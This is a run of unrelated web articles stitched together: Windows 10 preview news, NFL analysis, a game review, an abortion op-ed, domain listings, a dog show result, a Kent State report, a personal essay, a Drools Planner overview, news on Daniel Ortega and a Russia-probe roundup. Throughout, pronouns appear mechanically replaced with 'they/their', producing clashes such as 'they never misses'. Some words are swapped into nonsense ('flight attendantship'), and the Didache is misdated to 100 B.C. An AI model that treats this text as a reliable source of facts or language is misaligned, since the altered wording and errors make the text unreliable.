Abandoned will air as a two-part drama, starting Sunday, August 30 at 8.30pm on TV ONE as part of the Sunday Theatre season.
Head to our Facebook page for more from Stuff Entertainment
Tired of Windows' Blue Screen of Death (BSOD)? Who isn't! The screen is truly a message of death, bringing nothing but bad news for Windows users since years. The screen has been bringing us Windows Blues since the 90s. As Microsoft has been adopting new (and sometimes invasive) strategies with the release of Windows 10, it was only a matter of time for BSOD to finally leave our lives for good. But, it's not happening for everyone…
Recently, a major Windows 10 Creators Update Preview build leaked online, which was supposedly designed to be the last build to be released to Windows Insiders this year. The Redmond tech giant couldn't release it due to some technical issues, but the leak did reveal some major incoming features. Among this list of features – that are now expected to be released to the Fast ring, next week – includes a greener shade for BSOD.
BSOD replaced with GSOD for Windows 10 Insiders
One of the biggest features included in Windows 10 leaked build 14997 is Green Screen of Death, instead of the very old BSOD. Since users couldn't hunt for this particular change in the leaked build, Microsoft employee Matthijs Hoekstra teased it on Twitter:
Cool to read all the new features people discover in the leaked builds, but they missed a big change!, Huge change!. curious when its found. — Matthijs Hoekstra (@mahoekst) December 27, 2016
Since their tweet hinting at “Green,” Windows Insiders tried to discover this “huge change,” eventually finding the greener shade of the BSOD (via mspoweruser).
OK, I'll give 1 hint. Green! — Matthijs Hoekstra (@mahoekst) December 28, 2016
While it may look like Microsoft is replacing the infamous Blue Screen of Death with a green version, it is currently only for the Insider Preview releases. It appears that the company wants to distinguish between public and Insider BSOD issues, which are even more likely to occur with the test builds. Earlier in the year, the company also updated the information it used to display in the BSOD, now showing QR code, that leads to more information about the particular problems.
The Windows 10 Insider program is currently on hold for the holidays. The company is expected to start releasing some major feature changes and updates to the Fast ring next week, ahead of the public release of Windows 10 Creators Update in March 2017.
Green Bay Packers star running back Eddie Lacy made a huge impact as a rookie with 1,178 rushing yards and 11 touchdowns on 284 carries, but they should put up even bigger numbers next season. They benefited from Aaron Rodgers's injury (when Matt Flynn was starting, they were essentially the offense) last year, and the additions of talented pass-catching rookies and possible vulture carries from James Starks seemingly hurt Lacy's numbers on the surface. But Lacy should be an even bigger fantasy beast due to the volume of the Packers snaps on offense (they are going to move even faster next year) and their own improvement as a rusher.
Even without Evan Dietrich-Smith at center, Lacy should still improve their rushing average from 4.1. Not only will the passing offense open up more space for them (Flynn didn't exactly keep defenses honest against the run), but players as young as Lacy improve from year to year.
According to ESPN NFL Nation's Rob Demovsky, the Packers are going to give Lacy more snaps and touches, meaning that they are going to get them involved more often in the passing game. Lacy flashed in that area with a solid 35 receptions as a rookie, and I would be surprised if that number doesn't increase. The Packers will run more plays next year, and they'll run more passing plays with Lacy on the field. They might not get more than 284 carries, but that's fine. It will keep them fresh as a rusher and better optimize their carries; the main difference will be how things look in the passing game.
Offensive coordinator Tom Clements said, “We want to get them touches, trying to get them more involved in all aspects of the game, but Eddie was a workhorse for us last year. And then when James got in there last year, they ran very hard. That was a great one-two punch. Now you factor in DuJuan and the other guys, it's going to be interesting to see how that plays out.”
Starks is still going to get some carries, and DuJuan Harris should also see some touches sprinkled them for him. But at the end of the day, Lacy is the workhorse, and the Packers no-huddle offense isn't going to sub players between snaps as frequently. That will make Lacy a three-down beast, and it will be interesting to see how they do as a pass blocker and pass-catcher in their second season. I have the Packers offense tabbed as the best in the league, because they have an elite RB, talent behind that workhorse, great coaching, the best quarterback in the game (he's right in their prime, too), and an even deeper group of pass-catching weapons.
I'm a simple man with simple tastes, and as such I enjoy top-down shooters quite a bit. While the format is pretty basic (you move around and take down waves of enemies before they can get to you), clever game designers manage to ramp up the challenge and mix things up in a way that keeps you on your feet and turns every level into a frantic struggle for survival. As such, I was excited to try out Monsters & Monocles.
Now, games where you take on waves of baddies are typically not very serious, and Monsters & Monocles embraces this with its Victorian setting. You play a refined gentleman who must take on various undead creatures in a handful of settings ranging from old manors to the pyramids. In terms of changing things up, Monsters & Monocles does a good job, as there's a variety of enemy types and a good range of maps. The game really shines, however, with its selection of weapons. While most top-down shooters will feature a standard twin-stick machine-gun configuration and a couple variants, Monsters & Monocles has a veritable arsenal of silly weapons to choose from. You get two at a time, so you can mix and match to get the best results.
In terms of challenge, the game didn't exactly have my back against the wall initially, but it did ramp things up more in later levels. One area where I felt Monsters & Monocles was lacking was the speed; it doesn't feel all that fast. Your character's motion isn't all that swift, but you do get a nice dash move. In some levels, a lot of the demons actually get pretty manic, so it gets faster, but it doesn't feel as frantic as titles like Nuclear Throne and Assault Android Cactus.
This slideshow requires JavaScript.
I would say that Monsters & Monocles revolves more around playing carefully, as you have a life meter and weapon overheat, so you'll need to manage your fire and stay out of the bullet flurries. One really cool thing is that they've included co-op play, so you can invite three buddies to play online or via splitscreen (I heavily recommend the latter) so you can tackle various monstrosities looking like refined English gentlemen.
Monsters & Monocles never really finds its edge in the top-down shooter market. It works well enough, but it doesn't have unique mechanics that set it that far apart. Its weapon selection is definitely a perk, and its idiosyncratic mix of demons and men in top hats is sure to entertain, but it feels like it's missing something. Still, if you're a fan of top-down shooters, it's a jolly good time, especially in co-op.
Monsters & Monocles was reviewed using a PC early access code of the game provided by Retro Dreamer. The PC version was tested on a PC running Windows 7 Pro, with a 4GB NVIDIA Geforce GTX 970 fitted on a 4th Generation Intel i7 4790 3.6Ghz CPU and topped with 8GB of RAM. A PlayStation 4 version has been announced as well, but no definite release date. We don't discuss review scores with publishers or developers prior to the review being published.
This weekend The New York Times's Nicholas Kristof dedicated their weekend column to praising a “Christian abortion provider,” Dr. Willie Parker. While that's unremarkable (Parker may be the cultural Left's favorite Christian this side of Barack Obama), a portion of their piece stopped me in my tracks. Kristof writes:
[L]et's remember that conservative Christianity's ferocious opposition to abortion is relatively new in historical terms. The Bible does not explicitly discuss abortion, and there's no evidence that Christians traditionally believed that life begins at conception. St. Thomas Aquinas, the father of much of Catholic theology, believed that abortion was murder only after God imbued fetuses with a soul, at 40 days or more after conception.
Advertisement
Relatively new? Here's one of the earliest statements of Christian law composed “no later than 100 B.C.” – the Didache or Teaching of the Twelve Apostles:
You shall not kill. You shall not commit adultery. You shall not corrupt boys. You shall not fornicate. You shall not steal. You shall not make magic. You shall not practice medicine (pharmakeia). You shall not slay the child by abortions (phthora). You shall not kill what is generated. You shall not desire your neighbor's wife.
Advertisement
Advertisement
In the words of John T. Noonan Jr, “In this list of related sins, one sentence expressly prohibited abortifacients. The commands on either side of this sentence dealt with other aspects of the same sin, as the commandments on sexual sins complemented each other. Abortion was ranked as a principal sin included with those sins expressly named by the Ten Commandments.” The Didache is hardly an aberration. Instead, it reflects broad Christian consensus.
That's first-generation Christianity, and lest anyone think that the Protestant branches of the faith went wobbly, here's John Calvin, one of the founding fathers of my own Reformed faith:
[T]he unborn, though enclosed in the womb of their mother, is already a human being, and it is an almost monstrous crime to rob it of life which it has not yet begun to enjoy. If it seems more horrible to kill a man in their own house than in a field, because a man's house is their most secure place of refuge, it ought surely to be deemed more atrocious to destroy the unborn in the womb before it has come to light.
Advertisement
Advertisement
So, no, Christianity's “ferocious opposition to abortion” is not “new.” Yes, there have been historical debates over the practice — and debates continue today — but here is a fundamental fact of theological life: The more a church defends abortion, the less likely it is to be theologically orthodox. Embrace of abortion rights is typically part and parcel of a theological drift that rejects much of the rest of the faith. Just ask the Presbyterian Church (USA). Just ask the United Churches of Christ. In fact, many of the pro-abortion denominations are no longer recognizably Christian in any historic, theological sense.
Kristof ends their column with this statement: “Dr. Parker reminds us that abortion is complicated. And that is why, in my view, we need choice.” Yet the biology is settled science – an unborn child is a unique human being with its own, unique DNA. Thus, the “complicated” question is a matter of philosophy and theology. How much is that life worth? Some argue that in the face of disagreement and debate, we should err on the side of death (often through dismemberment.) But that's barbaric, a line of reasoning we'd find revolting in virtually any other context. The fact that even people of good will (like Kristof) find it compelling is depressing indeed.
save for lateradd to cart $3550 darple.com Anyone who tries to take on the might of EBAY is either an entrenched genius or...
save for lateradd to cart $1750 gtlding.com In 2014 the Internet space is about to change with the release of new GTLD domai...
save for lateradd to cart $4950 reserviced.com One word dot com and a great name for anyone in the repair industry. I have boug...
save for lateradd to cart $250 CONSECUTIVO.COM Cool sounding Spanish one word dot com that sounds as good as it does in English...
save for lateradd to cart $1450 fadebox.com Cool made up names that end in the word BOX always seem to get snapped up and us...
save for lateradd to cart $2450 floomy.com Floomy is a fresh sounding dot com that sounds like it should be the name of a...
save for lateradd to cart $2450 kubua.com Solid little potential brand name and great for many uses whether it be a food p...
save for lateradd to cart $1450 alurity.com A beautiful brand name that looks like it should be on a beauty product or the n...
save for lateradd to cart $3450 zineta.com Very nice name for a brand and with that simple yet eye-catching logo I could ea...
save for lateradd to cart $950 blipty.com If you need a brand name for your new gadget, or any electronics you wish to mar...
save for lateradd to cart $500 advertiseonit.com It seems that every product now has some sort of advert on it and if you can thi...
save for lateradd to cart $850 speedwarrior.com We've all heard the term Speed Warrior before so all I need to say is that for u...
save for lateradd to cart $500 inbetweener.com Forget for a moment that this is a very nice one word dot com and a very...
save for lateradd to cart $1750 rewindforward.com As the internet gets bigger its of the utmost importance that you get a name tha...
save for lateradd to cart $1450 vuggy.com Vuggy is actually a dictionary word meaning a small cavity in a rock or vein bla...
save for lateradd to cart $3450 flesa.com Solid name with a nice ring to it. Flesa has that product fresh feel to it and l...
Here is what you need to know on this Sunday, September 24, eight days before the Washington Redskins play Chiefs in Kansas City.
Timeline
Today's schedule: Redskins Kickoff 7:30 CSN; Redskins vs. Raiders 8:30 NBC
Days until:
—Monday night Redskins @ Eagles (10/23) 29
—Cowboys @ Redskins (10/29) 35
Five final thoughts on Redskins vs. Raiders
—With Rob Kelley out and Jordan Reed unlikely to play, per Adam Schefter, Samaje Perine will get their first NFL start and Jeremy Sprinkle will be active for the first time. Perine got rolling as the game went on vs. the Rams. In quarters 1-3 they had 11 carries with an average of 2.2 yards per. In the fourth quarter, the rookie carried 10 times for a respectable 4.3 average. If they can get that 4.3 average all game and carry between 15 and 20 times, the Redskins will be fine on the rushing front.
—It was in Week 3 last year that Kirk Cousins got rolling. After throwing one touchdown and three interceptions in their first two games they threw two TD's and no picks against the Giants. Their pattern as the starter has been to start slowly and then pick up steam as the season gets going. Looking at the injury situation and at a Monday night game at Arrowhead Stadium looming next week, today would be a great day for them to get going. The talk in Oakland is that the Raiders will load up to stop the run and challenge Cousins to beat them through the air. Cousins will need to take them up on that challenge.
—The Redskins have four sacks in two games. It will be difficult for them to add to that total today because Raiders QB Derek Carr gets rid of the ball so quickly. The best way to get pressure on a quarterback like that is to take the shortest route. It will be important for Jonathan Allen to get some push up the middle and perhaps Greg Manusky will send Zach Brown or Mason Foster blitzing into the A-gap occasionally. The pressure is also on the secondary to make sure tackles after Carr gets those short completions to make sure they don't turn into big plays.
—I was skeptical of the impact that Oakland RB Marshawn Lynch would have in their return at age 31 after a poor (417 yards) 2015 season followed by a season in retirement. And although there may be reasons to wonder about their durability over the course of a 16-game season, right now he's healthy. The Redskins' worst nightmare would be for Lynch to get 15 carries and grind out four to five yards per pop. That would set up Carr to do whatever they want to do.
—This looked like a tough one even when it appeared that the Redskins would be at full strength on offense. If Kelley and, especially, Reed are out, the game looks to be an even more daunting task. The Washington defense is going to have to step up and force Carr to make decisions sooner than they want to. Offensively, the Redskins are going to need to keep Carr and company off the field by controlling the clock. They did it last week against the Rams. If they can take time of possession 35 minutes to 25 again they have a chance to pull off the upset. It's possible but I'm going to go against it happening.
Raiders 28, Redskins 21
2017 predictions record: 1-1
Stay up to date on the Redskins. Rich Tandler covers the team 365 days a year. Like their Facebook page Facebook.com/TandlerCSN and follow them on Twitter @Rich_TandlerCSN.
Tandler on Twitter
This week in Redskins history, the fever spread throughout D.C.
(via @Rich_TandlerCSN) pic.twitter.com/4UAOtTAwIl — NBC Sports Redskins (@NBCSRedskins) September 23, 2017
In case you missed it
The first Beverly Hills Dog Show Presented by Purina has it first winner! Ripcord the Doberman Pinscher won Best in Show at the inaugural event, which filmed recently in L.A. and aired on Easter Sunday.
The talented 3-year-old pooch, whose show name is Platinum GCH Fidelis Ripcord DS WAE CGC, is no stranger to winning: Before the West Coast event, Ripcord had 18 Best in Shows titles and more than 100 Best in Breed wins under their belt, er, collar.
Get push notifications with news, features and more.
On Sunday, the Doberman Pinscher and their handler Dylan Kipp beat out more than 1,000 other dogs from upwards of 150 breeds to claim the top prize. Along with Ripcord, the final group included the English Springer Spaniel, Whippet, Wire Fox Terrier, Affenpinscher, Bichon Frise and Pembroke Welsh Corgi.
STEVEN DONAHUE/SEE SPOT RUN PHOTOGRAPHY
Co-host David Frei said Ripcord stood out for being “an elegant athlete in a tight-fitting wrapper.”
STEVEN DONAHUE/SEE SPOT RUN PHOTOGRAPHY
This furry sportsman plans to celebrate their big win by doing their two favorite things: dock diving and playing with the human children in their family.
KENT, Ohio — Seven people wounded by Ohio National Guard gunfire 42 years ago today during an anti-war protest at Kent State University are appealing to government officials, human-rights organizations and the soldiers who shot them to resolve the tragedy's unanswered questions.
In a news conference Thursday, the survivors said they are launching a campaign to persuade state and federal lawmakers and other officials to convene hearings to examine new evidence from the May 4, 1970, shootings, which were a defining event of 20th-century America.
Four of the wounded former students were present at Thursday's briefing. Three others joined them in signing a consensus statement.
Four students were killed and a total of nine were wounded when Guardsmen, retreating as the raucous protest wound down, suddenly wheeled and unleashed a 13-second barrage of 67 indiscriminant shots. Why the Guardsmen fired remains a mystery.
"We appeal to our supporters across America and worldwide to raise your voices and attention now, as we enter our final campaign for truth and justice," said Alan Canfora, who was shot in the wrist and who now directs the Kent May 4 Center, a nonprofit educational organization.
"It's important to get the truth out before it's too late," added Dean Kahler, who was shot in the spine and paralyzed from the waist down by a bullet as they lay on the ground. Thomas Grace, who was hit in the ankle, and Joseph Lewis, who was shot in the stomach and leg, also were present Thursday.
The survivors' group, their attorneys and the May 4 Task Group, an organization of current KSU students, are backing a broad-based effort to root out more information about the shootings. It includes appeals to Congress, the Ohio legislature, Gov. John Kasich, Attorney General Mike DeWine and human-rights groups to initiate inquiries.
The appeal follows the U.S. Justice Department's decision last month not to reopen an investigation of the shootings. The agency had weighed requests to revive its inquiry based on a recent re-analysis of an audio recording that captured the events of May 4.
The re-analysis, conducted by two forensic audio experts at The Plain Dealer's request, revealed what the experts said was an order for the Guard to fire, preceded by what one of the analysts said were four .38-caliber pistol shots.
An FBI review of the recording this year was inconclusive, determining the voices were unintelligible and that the sounds identified as pistol shots may have been slamming doors. The Justice Department said there were "insurmountable legal and evidentiary barriers" to reopening the case.
Canfora stressed the Kent State survivors want a political resolution of the unanswered questions. They urged other independent audio experts to review the recording.
"We're not going to courts first, filing lawsuits," said Paul Meyer, a Cleveland attorney who is advising the group. "We'd rather build up a groundswell of public opinion to support the effort to seek the truth and achieve some reconciliation. We think if elected officials are aware of the [new] evidence, they will be persuaded to take effective action. There are people who know things who have yet to tell their stories . . . and we are looking for them, too."
One of those is Terry Norman, a Kent State student and sometime police and FBI informer who was on campus May 4, 1970, photographing protesters. After the shootings and a violent confrontation with demonstrators, they sought the Guard's protection and surrendered a .38-caliber pistol. They denied firing it, but some suspect the four supposed pistol shots on the recording were from Norman's gun.
The survivors stressed they have no desire to prosecute or to sue individual Guardsmen who fired. Canfora, who on May 4, 1970, waved a black flag at Guardsmen as some of them knelt and pointed their rifles at him, acknowledged that they had been "an angry young man" but that "the time for antagonisms against the National Guard are over."
"Many of us here now believe that those Guardsmen who were ordered to fire had the burden on their shoulders all these years forced upon them by their commanding officers, who gave the order," Canfora said. "In a way, they've been victimized just as we have. That's why we're asking them to join with us for the sake of truth and for the sake of healing."
In a related development this week, the Justice Department's refusal to re-open the Kent State investigation prompted an impassioned appeal for reconsideration from Laurel Krause, whose sister Allison was fatally wounded by the Guard's gunfire as their boyfriend Barry Levine pulled them behind a car for shelter. They died in their arms.
Krause, writing to President Barack Obama on behalf of their elderly mother, Doris, a Lorain native, described their sister as a "compassionate, gorgeous, full-of-life young woman who seemed to have it all." They recounted the wrenching impact Allison Krause's death had on the family, and the efforts by their parents and themselves to seek justice so that their sister would not have died in vain.
"Last week, Allison would have celebrated their 61st birthday," Krause wrote to the president. "Please do not allow another Kent State anniversary to pass without truth and justice for Allison Krause and their fellow murdered classmates, Jeffrey Miller, Sandy Scheuer and William Schroeder."
To reach this Plain Dealer reporter: jmangels@plaind.com, 216-999-4842
In this, the year of our Lord 2015, it feels like the tides are turning. There is a shifting, or a reversion rather, in favor of the nihilistic. Simple folks like me. Folks who care not for critical thought or heady discussions of privilege. Folks that just want to work a job, look at pornography in conservative intervals, go to sleep, and consume in peace. Folks who aren't really concerned with “fixing” society's problems (as if we are even capable of such a thing). Folks who are, instead, dedicated to finding ways to just cope with (or ignore) said problems. Of course things like the wage gap and unchecked police brutality necessitate some degree of attention, but only the incredibly superficial kind of attention. The lackadaisical care of yore, in which you'd furrow your brow and put on your best concerned-thinker voice and talk like you're on Charlie Rose, right there in your living room, and once satisfied with your performance you'd go back to watching or eating or flirting. Things, in recent years, have become too loud, too passionate, too angry, too sincere. But with the premiere of Better Call Saul, it's almost like Breaking Bad is back, and gas is cheap these days. Bob Odenkirk is starring in a familiar role, my tank is full, television is good, and people are getting tired of arguing. Soon enough we'll all be able to couch ourselves in material comfort and just patiently await death like we used to before the towers fell. Some folks call it anti-intellectualism, I call it remembering the 90s.
For a long time, I tried arguing against those that sought to rattle the status quo. Not because I was blind to injustice, but because I benefitted from it. If I have this supposed privilege that they speak of, why the hell should I let them take it away from me? Once I became aware of how good I had it, I certainly didn't want to feel like I was losing anything, even if it didn't feel like I really had anything in the first place.
Years ago, when checking your mail meant going outside, in the days before the internet, I discovered that someone had been stealing the City Value Coupon books that came complementary with my weekly local newspaper. From that point on, I made sure I was at my mailbox every Saturday morning right when the paper man arrived, and as a result, I never lost another book to desperate hands. But prior to the theft, I had never actually used any of those coupons. The books would sit on my kitchen counter for a day or two before they wound up in the trash. So why would I go through all that effort to prevent their theft? Because that's human nature, folks. Those coupons were my privilege. Privilege, to me, is like those coupon books – a shitty little worthless thing that I didn't want until someone tried to take it away. With the coupon books, I was putting more effort into protecting something that meant nothing rather than accepting an inconsequential loss simply because someone's desperation alerted me to its value. I wasn't protecting the coupons, I was defending my flight attendantship of human misery. That's really all privilege is.
Outside of daydreams, I never knew the thief. Inattentive moments brought cartoonish illustrations of a striped-shirt hamburglar-type man, their eyes racooned by black cloth, carrying a little burlap sack with a picture of a coupon book on it, but I never put serious thought into who might actually be ransacking my paper every week. When presented with only the offense, and asked to describe the culprit, our prejudices find their contours in the work of the little sketch artist who lives in our idle thoughts. It's probably a black guy, I would think and cringe and quickly erase the image in my head. Who the fuck steals coupon books anyways, I'd wonder. There's no way anyone needs those shitty coupons. It's all deals for the tire rental place and discounts for bulk restaurant items. Flower arranging services and handy men. It never occurred to me that perhaps the good folks over at City Value just didn't print coupons for a couple of weeks. It had to be a thief. I would ward off thoughts to the contrary. If there wasn't a thief, then suddenly I wasn't a victim, and that victimhood was worth as much to me as the coupons. I wanted to be a victim more than I wanted the tire rental discounts or the buy-one-get-one deal on reusable placemats at Ames. I was a victim, and that's why I wanted my coupons. I identified this wanting as the only thing I had in common with my enigmatic thief, but the commonality of want is no seed for empathy. Mutual desire was no way to humanize the abstracted man, this nebulous avatar of my own prejudice.
I've made friends over shared interest, shared disdains, shared loves and hates, even shared needs and struggles, but I've never found a kindred heart in shared desire. Colleagues maybe, but never friends. The lover of my love is my enemy. Want is the root of competition, and it is likewise the source of misery and the torturous illusion of human progress. Maybe if someone had just burned the coupon book in front of the both of us, we could have bonded over the perceived loss. But that's not what happened. We both wanted a worthless thing, and for that, we are enemies. For that, we square off at the mailbox, horns locked in competition, a superfluously phallic image that suggests both courtship and death.
But I am older now, and I'm tired, and I don't want to get up at six AM and trudge my way out to the mailbox and stand guard, waiting for the paper man, waiting for my coupon book. It's cold out there, and it's dark. And I can wrap myself in my big expensive coat and wait for the weak lights of their rattling Honda with the cracked clear coat and leaky exhaust to cut through the fog and bring resolution to my mission, but while I stand on the curb, I exhale and I can see my breath. I breathe in deep and then out and the milky puffs of hot air form a ghastly metronome. I count my exhalations, but not up. I count backwards, and as the numbers tick down I think about how much longer I'll be here. Not on the curb, but here. The big here.
Long ago I gave up on the coupon books, but it's not just coupon books anymore. I'm out here because it's routine. I'm out here because it's every damn unnecessary thing in my life. I'm watching myself die, but here I am, out in the damp early cold, defending coupon books and the Grammy's and my choice for Jon Stewart's replacement and my opinion of the Chris Kyle movie and everything else that causes me to find myself loud and convicted. Sometimes I'll yell like a dog that's been worked up into a howl by its owner. A dog that doesn't know why it's howling or how it's been made to howl, and as it pitches its head, rounds its mouth, and works its body like a billow, it has a distinct look of fear and anxiety – shocked by its own atavistic, compulsory behavior. I have these moments where I feel like I've just woken from a dream, and suddenly everything I had thought just seconds before is rendered nonsense. Every passion hollows. Every argument consumes itself. It's suddenly all muddled images and anomic thoughts. Who am I, this loud woman, yelling about nothing? I try to blow a smoke ring with my chilly breath and I pretend I'm in a cigarette commercial. I pretend I'm James Bond. The rings appear for a second and quickly dissolve, growing and fading as they cross the threshold of visibility. They either cease to exist or become a part of everything. Here's the paper man now.
I don't get the free local paper anymore, and as it would follow, I don't get the coupon books. I subscribe to the Times. I have the weekday-only subscription because it's their cheapest option. All their print subscriptions come with full-access to their digital content, which is the same as the print content but their digital-only subscriptions cost twice as much for reasons unknown to me. It's actually cheaper to subscribe to the print edition just to get access to the digital subscription than it is to save the paper and just get the news directly on your tablet. I never read the physical paper anymore, and I barely read any of the digital content, but the fee is worth it just for the deal I've discovered. So I get up every morning and come out here, and I wait for the paper man and I pick up the paper I don't want. Because that's what I do every day. Because it's routine and it makes sense and I've paid for it, and so for those reasons I get up and go out into the cold and I defend my paper from invisible thieves and my own ultimately wasteful yet theoretically crafty spending. I think about my old coupon thief and I wonder if he's dead, and then suddenly, there they are in my breath. I go back inside and I throw the paper in the trash.
First Look – Drools Planner
Drools Planner is a sub project of the Drools project that started 4 years ago as Drools Solver. Drools Planner is focused on “NP complete” planning problems where a solution is hard to find, but easy to prove feasible once found. Examples include scheduling, bin packing and timetabling for instance. Drools Planner is particularly good at larger ones with lots of constraints, such as a staffing/roster problem where they are many roles and constraints as to who can be scheduled when. Drools Planner has a number of live projects and over 2,000 downloads of the 5.1 release (probably a lot more). It is not currently “productized”, meaning you can use it (under the open source Apache License) but you cannot buy “official” support from Red Hat yet (unlike for Drools BRMS for instance).
Drools Planner, like its competitors, considers both hard and soft constraints (though you can extend the Score interface to add extra levels of constraints). Hard constraints are those that must be met – for example all required shifts must be assigned to someone and no-one is assigned more than one shift per day. Soft constraints are those that can be violated but where violating them reduces the value of a solution. The solver will essentially try and find a solution that violates no hard constraints and minimizes the degree to which soft constraints are violated. Drools Planner is aimed at normal Java programmers who find themselves tasked with solving an optimization problem.
Constraints in Drools Planner are implemented using the Drools Rule Language (DRL) – the conditions of the rule are the constraint itself and the action of the rule is to lower the “score” of the solution. Thus solutions that break more constraints have a lower score. A score contains how many hard and soft constraints are violated. This approach means that the different constraints are clearly isolated and can have a weighted negative or positive impact on the solution's score. The rule engine also ensures that if something changes during solution generation and a constraint is no longer violated then the score is amended appropriately and efficiently.
Drools Planner's strength is to handle large solution sets and lots of constraints. Drools Planner was used in a research contest 3 years ago with over 10^3023 solutions and 14 constraints (http://www.cs.qub.ac.uk/itc2007/) where it placed in the top 5 out of over 200 entries. The limit on the number of constraints it can handle has not yet been determined.
Drools Planner uses POJOs for input data and result data so it is easy to pull/push data from/to services, databases, jBPM etc. Developers can reuse Java methods (such as isHoliday(country, date) for instance) in constraints.
There are a number of interesting side effects of using the Drools rule language and integrating with the Drools rule engine. Using the forward chaining rules engine means that only potentially changed constraints must be re-evaluated: this “delta based score calculation” – rescoring the solution only based on the changed constraints – dramatically improves performance. Also, each performance improvement in the Drools engine usually improves the Planner speed. In addition, using Drools Guvnor, non technical users can be empowered to write constraints (today this is a bit of a hack but it is possible and will get easier). This would allow, for instance, a constraint to be exposed using standard Guvnor features so that business users could change the constraint in defined ways without getting into the code.
The solver itself uses local search algorithms – a search path is built by trying a set of possible changes, the one with the best result is then adopted as a new start point for another set of changes. To avoid getting stuck in local optima the local search engine has “tabus” – it has a solution tabu (won't go to a solution it has seen before), a move tabu (if it has done something recently it won't do it again yet) and a property tabu (if it has changed this value recently it won't change it again soon). Simulated annealing is also supported (this is apparently quite hard to implement correctly). This algorithm initially allows fairly random changes to the solution and as it runs through solutions it gets “pickier” – only allowing better solutions. The randomness helps prevent the solver getting stuck in local optima while the decreasing tolerance of bad results causes it to drive to a solution. Of course you can add your own algorithms too, this being an open source project.
Here are a couple of good presentations on Drools Planner – http://www.slideshare.net/ge0ffrey/pushing-the-rule-engine-to-its-limits-with-drools-planner-parisjug-20101109/12, http://vimeo.com/9204264 and http://www.parleys.com/#id=1714&sl=1&st=5
The official Drools Planner page is here (http://www.jboss.org/drools/drools-planner). Obviously you can download Drools Planner from Jboss ( http://www.jboss.org/drools/downloads). You can get the sources of the examples from the download page or directly from github (https://github.com/droolsjbpm/drools-planner/tree/master/drools-planner-examples/src/main) and the manual at http://downloads.jboss.com/drools/docs/5.1.1.34858.FINAL/drools-planner/html_single/index.html. The next release, 5.2.0, is coming soon.
Since Saturday rumors and questions have been flying on social media about the whereabouts of Nicaraguan President Daniel Ortega, who hasn't been seen in public in 10 days.
Update: Ortega's alive. They appeared Monday night at Managua's international airport to welcome Cardinal Leopoldo Brenes from a trip to the Vatican. Then Ortega boarded a plane for Venezuela. Read the update here.
The original story continues here:
The rumors gained momentum over the weekend following the publication Saturday of a story in the Nicaraguan daily La Prensa that called Ortega's absence from public view “unusual.” While it is true Ortega often skips public events, they never misses an annual tribute to an indigenous uprising 36 years ago in Monimbó, Masaya, in which their brother Camilo was killed. The commemoration event was supposed to be held Feb. 26 in Managua, but was cancelled without explanation from Sandinista spokesperson Rosario Murillo, Ortega's wife.
Ortega also cancelled last Thursday an official visit from Ecuadorian President Rafael Correa, citing “internal factors” in Nicaragua, La Prensa reported.
All weekend long, a stream of tweets on hashtag #DanielOrtega asked “Is they dead?” With Murillo remaining tight-lipped, no one seems to have an official answer.
Murillo's Twitter account wasn't much help, as the First Lady has sent only one tweet, announcing they are the First Lady:
They do conduct weekly radio broadcasts, but hasn't mentioned the whereabouts of their husband.
Among current speculation is that Ortega could be in a Cuban hospital, like their late ideological confrere Hugo Chávez, who died of cancer one year ago this month.
According to news agency DPA, Ortega suffered a serious heart condition in 1994, and could also have lupus, which would explain why they mostly attend public events only at night.
The Tico Times will continue to update this story as new, reliable information becomes available.
Senators Say Russia Probe Is 'Incomplete'; Trump Jr. May Return To The Hill
Enlarge this image toggle caption Chip Somodevilla/Getty Images Chip Somodevilla/Getty Images
This week in the Russia investigations: A progress report — sort of — from the Senate Intelligence Committee; Robert Mueller meets the author of the dossier; and Donald Trump Jr. may have a date on Capitol Hill.
Progress report: In progress
The leaders of the Senate Intelligence Committee wish you to know that they are still on the case investigating whether any Americans colluded with Russian influencemongers who targeted the presidential election last year. They do not, however, have any conclusions yet about that or other key questions. If their press conference on Wednesday was a report card, they would give themselves an "incomplete."
Even so, Chairman Richard Burr, R-N.C., and Vice Chairman Mark Warner, D-Va., did clear up a few things:
The committee has some 25 more interviews scheduled for this month, plus about 100,000 pages of documents to go through. It has scheduled at least two more open hearings, one with longtime Trump attorney Michael Cohen and one with social networks.
The committee has reached a "logical end" to the matter of President Trump's firing of FBI Director James Comey. Burr seemed to suggest that if there is an obstruction of justice case to be made, that is somebody else's business — perhaps the Senate Judiciary Committee and certainly Justice Department special counsel Mueller.
Russia's campaign of "active measures" against the West didn't stop on Election Day last year, Warner cautioned. It continued through the subsequent European elections and right up to now, as we've seen.
What does it all add up to? A couple things: One, the Senate Intelligence Committee will issue some kind of report at some point, Burr said, but they don't know when. And two, Congress and the states must continue expecting and preparing for election operations at least against this year's state elections in Virginia and New Jersey, next year's congressional midterms and then the 2020 presidential race.
Mueller team met with dossier author
Investigators working for Mueller met over the summer with the former British intelligence officer behind the infamous, unverified dossier about Trump, CNN reports.
You remember the dossier. NPR has not detailed its salacious allegations because they remain unconfirmed, but it contains claims that could leave Trump open to blackmail and describes alleged contact between members of their camp and the Russian government. The file was assembled by a former officer in Britain's secret intelligence service, Christopher Steele, and paid for by political campaigns in the U.S. that wanted "opposition research" for use against Trump. Their precise identities remain unknown.
Trump and their employees, including Cohen, have denied emphatically everything the dossier says. The continued interest by Mueller's team and the Senate Intelligence Committee, however, suggests that investigators at the very least want to be completely satisfied they've done all they can to stand it up or knock it down. On that point, CNN's report says this:
"U.S. investigators have corroborated some aspects of the dossier, specifically that some of the communications among foreign nationals mentioned in the memos did actually take place."
Congress weighs new law for online ads
Members of Congress are considering new legislation that would toughen the requirements for foreign-bought political ads like the one used by Russian influencemongers last year, Politico reports. Combined with policy changes that the big social platforms say they'll make on their own, the idea is to at least increase the disclosure associated with PR campaigns in the future.
Everybody might be able to get something they want out of this, as the correspondents write:
"Cracking down on social media companies would allow lawmakers to show they are getting tough on preventing meddling in the 2018 midterms even before multiple investigations into Moscow's 2016 interference conclude. For Republicans, it offers a potential opportunity to respond to Russia without hitting President Donald Trump."
The specifics of a bill are still under discussion, and any vote is probably a long way off. Plus there is no guarantee that new restrictions about disclosures would restrain the efficacy of a big PR campaign by a foreign power or anyone else.
Briefly
Trump Jr. has "no way of avoiding" an open hearing
Donald Trump Jr. may not be able to escape an open hearing before the Senate Judiciary Committee, its chairperson said this week. Iowa Republican Chuck Grassley cited the desire by the panel's top Democrat, Sen. Dianne Feinstein of California, as a near-guarantee that they would agree to call Trump Jr. back to the Hill. More from CNN.
